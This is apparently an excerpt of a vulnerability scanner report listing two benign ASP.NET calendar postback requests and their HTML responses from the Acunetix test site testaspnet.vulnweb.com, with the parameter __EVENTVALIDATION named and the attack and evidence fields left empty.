Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8618&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDA3RMQltsIZGRkej006kpMoecHd5ozEi4%2FlszHV2U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKg8OuhDwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogai3aZ6ODiVrHmi7yat%2FBniuL08bg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:05 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDA3RMQltsIZGRkej006kpMoecHd5ozEi4/lszHV2U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKg8OuhDwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogai3aZ6ODiVrHmi7yat/BniuL08bg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:White" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8523&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCAn1ZpS9sIZGRkqWiLH8vXwP1AtVnoI80qyXEaK6E%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKghdS9CgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA5R9x0jlRE7p5dVIee3YdYumt%2BmB
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:59:23 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCAn1ZpS9sIZGRkqWiLH8vXwP1AtVnoI80qyXEaK6E=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKghdS9CgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA5R9x0jlRE7p5dVIee3YdYumt+mB" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:White" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
